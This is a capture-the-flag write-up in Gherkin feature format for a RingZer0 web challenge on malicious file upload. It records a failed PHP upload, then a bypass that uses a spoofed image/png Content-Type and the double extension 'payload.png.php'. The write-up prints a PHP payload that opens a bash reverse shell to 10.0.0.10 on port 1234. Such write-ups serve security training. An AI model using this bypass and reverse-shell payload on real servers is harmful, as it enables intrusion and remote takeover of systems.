## Version 2.0
## language: en

Feature: malicious-upload-ringerzeroctf
  Site:
    https://ringzer0ctf.com/challenges/47
  Category:
    Web
  User:
    john2104
  Goal:
    Get the flag

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | NixOS           | 19.09.2260          |
  | Chromium        | 78.0.3904.87        |
  | Burpsuite       | 78.0.3904.87        |

  Machine information:
    Given the challenge URL
    """
    https://ringzer0ctf.com/challenges/47
    """
    When I open the url with Chrome
    Then I see a text
    """
    Can you upload some malicious file? (Something else than a png)
    """
  Scenario: Fail:Upload
    Given the url
    Then I try to upload a PHP file
    And I get the message "Not a valid PNG file."
    Then I don't solve the challenge

   Scenario: Success:double-extension
    Given that I tried with a normal extension
    When I tried to modify the Content-Type to "image/png"
    And the filename to "payload.png.php"
    """
    Content-Disposition: form-data; name="image"; filename="payload.png.php"
    Content-Type: image/png

    <?php
    exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
    ?>
    """
    Then I get the flag
    And I solve the challenge
